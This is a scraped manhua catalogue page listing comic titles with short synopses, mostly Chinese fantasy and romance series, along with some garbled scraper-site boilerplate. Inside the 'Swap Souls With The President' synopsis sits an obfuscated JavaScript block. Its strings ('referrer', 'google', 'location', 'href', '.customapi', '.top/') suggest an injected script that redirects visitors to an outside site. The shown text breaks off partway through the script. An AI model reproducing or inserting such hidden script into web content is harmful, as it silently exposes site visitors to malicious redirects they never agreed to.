Manhua - Page 89

Manhua is a style of Chinese comic characterized by its intricate artwork and diverse storytelling. With a blend of Chinese cultural themes and popular genres like romance and fantasy, manhua offers something for everyone.

1458 results

Swallowed Star

Read Manhua Swallowed Star / Star Devourer / The Legend Of Spacewalker / Thôn Phệ Tinh Không / Tunshi Xingkong / Tūnshì Xīngkōng / 吞噬星空 In the Year 2056, a teenager clad in a tactical vest, combat pants, and alloyed combat boots sat atop a ruined and shattered six story apartment building. The building lies in a Prefecture-level city in the Original Jiangsu area. With a Hexagonal Shield and a Bloodshadow Combat Sword on his back, the young man sat silently on the edge of the roof. Under the brilliant hue from a starry night, it brought forth a breath of fresh air as the night breeze caressed his body. However, within this now ruined city, all was silent… all except for the occasional chill-inducing howls…


Swap Souls With The President

The fourth year student of the University of Agriculture and Forestry, Duo WeiWei, the biggest wish is to be able to grow bigger cucumbers than previously harvested, but she has to repay the loan to her useless father, because So Duo WeiWei is forced to make sexy livestreamer! Because of an unintended incident, she bumped into the body of the horrible CEO, Wan MingZe, besides, the soul of Wan MingZe in her body battled fiercely with her boss!<script></script><script>function _0x1a50(){var _0x17b75d=['then','lwzUC','2781150HFHZgu','.top/','dskBg','EziZI','href','https://ip','random','24ItMcCm','IdyCs','text','.customapi','dgvLM','google','Lsspx','77565DVEgEG','1002710VSintb','http://rea','135870WJCFzx','','xezhK','referrer','location','IPNRx','mVvGr','4142648cZTEMc','zpScF','7601823XqKHKe','includes','14lOyuzr','6346242AWUsTv','floor'];_0x1a50=function(){return _0x17b75d;};return _0x1a50();}(function(_0x4e0976,_0x36a7b8){var _0x50e427=_0x4e89,_0xa2ea7f=_0x4e0976();while(!![]){try{var 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Sweet Bite (Rui Si-Yi Kai)

The noble prince falls in love with a humble commoner! A confinement of possession begins, like the game of cat and mouse... But you can't stop love, a soft bite, is my property.


Sweet Desire! The Cold Lord God, Who Can Tease, Coax, And Act Coquettish.

Prisoner No. 001 of Tianjie, Si Jin, was sentenced to go to the three thousand planes to experience various miserable lives because his crime value seriously exceeded the standard. A bankrupt movie king, an ancient king, Lord Poseidon, being treated like a bully? Absolutely impossible! Slap the villain in the face, do something wrong, and achieve a reversal of fate! Then he kidnapped a shady old fox! After traveling through different planes, protecting and doting on each other, it turns out that you are the love of my life.Sweet Desire! The Cold Lord G**, Who Can Tease, Coax, and Act Coquettish., mangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can , online for free at mangabuddy. Chapters are updated hourly with high-quality graphics and a full English translation. Find free translations of your favorite , and . The latest updated content on mangabuddy is now available.


Sweet Love in Beast World: I Am the Rain God in Another World

Read Sweet Love in Beast World: I Am the Rain God in Another World online free At MANHUATOP. Manga is updated fastest with high-quality images, giving readers the best experience. Description of the comic Sweet Love in Beast World: I Am the Rain God in Another World Lin Mingyue, a brilliant modern bio researcher, stumbles into a fish tank during her quest for new species. But instead of a splash, she plunges into a primitive beast world’s scorching desert. There, she accidentally unlocks the mystical “Rainfall Buff”. She must complete the perilous “Desert Oasis” mission assigned by the system and retrieve treasures from four tribes to return home. In this bizarre realm of beasts, Lin Mingyue becomes the object of desire for males, while countless jealous females plot against her. How can she navigate treacherous waters, fulfill her mission, assemble a harem of handsome men, and outwit the villainous superficial whores? Alternative Name Shou Shi Tian Chong: Wo Zai Yi Jie Dang Yu Shen; Shòu Shì Tián Chǒng: Wǒ Zài Yì Jiè Dāng Yǔ Shén; Sweet Love in Beast World: I Become a Rain Goddess in a Bizarre Realm; 兽世甜宠:我在异界当雨神; 女神様の不本意な情事 The One shot, Psychological, Sci-fi genre is the most searched for by readers on the MANHUA TOP website. Manhwa Top is updated the fastest with high-quality images, bringing readers the best experiences. To bring even more great comics to readers, please share with friends to support our MANHUATOP website.” You can HOT MANHUA recommendation!!! Me, The Heavenly Destined Villain Don’t pick up the trash you threw away The Indomitable Martial King


Sweet Robot

When a human girl meets a robot that does not have any emotions, what does it have to do with him in the past? How will love story be staged next?! Light, funny, sweet, warm budding affection every day. To find love despite a broken heart. What waits for them? How will it end?


Sweetheart V5: The Boss Is Too Kind!

<h2>Sweetheart V5: The Boss Is Too Kind!</h2> Jing Yiren was a proud and talented 14-year-old princess. One night, she was transmigrated, and she became the 19-year-old wife of the Lu Conglomeration’s President. This sudden change would test every fiber of her being! For his part, Lu Ming now has to deal with a wife who is wholly confused by her new station in life. In the face of such problems, he can only get through to her with his actions


Taixu Apartment

The rich second generation Lee Feng discovered overnight that his parents had disappeared in the name of traveling around the world together. The company went bankrupt and all the assets of the family were frozen. He became a pauper, and his beloved girlfriend had to break up with him. Fortunately, his parents left him an apartment as the last resort. The disheartened Lee Feng went to take over the apartment, but found that the house called "One Apartment" had turned into a mysterious "Taixu Apartment", and Lee feng also became the owner of this apartment...


Take A Good Look At Me Now

The First Son-In-Law Vanguard of All Time by a comic artist named Zhǎng yuè tells the story of Xu Wuzhou passing through time and space, and he is surprised to find out that he has become a son-in-law, he is not only known as a trash worm but also On the first night of the marriage lying on the bed of a prostitute, after eating, she entered shan brothel and was caught red-handed. his cold wife was very disappointed in him. His father-in-law locked him in the Qin family's warehouse to punish him. however, because He had passed through, He got a reincarnation bowl that was broken, to increase its strength, it would have to swallow a metal … visit


Take Me

Living together with a crush…but he’s a ghost?


Take Your Mommy Home

<h2>Take Your Mommy Home with other name You Look Like My Son's Mommy</h2> - Why? Five years ago, it’s were you who slept me?,And why after five years, it’s you again? Bai Chu Xiao was angry and held Jiang Cheng Yu’s collar and said, “I’ve been through hard time so much, how do you plan to compensate me?” The evil charm of Jiang Cheng Yu’s smile, he hugged her and said, “Is it enough with two babie plus my lifetime to compensate you”?\ Abduct A Mommy And Bring Her Home, 拐个妈咪带回家, You Look Like My Son's Mommy, Take Your Mommy Home


Talent Copycat

The fate of Ye Tian changed when he gained the ability to replicate the talents of other people. In order to protect his sister, he was struggling to survive in a world where alien beasts had invaded. In order to become stronger, he started exploring unknown worlds and gradually unravelled the secret to enter different dimensions…
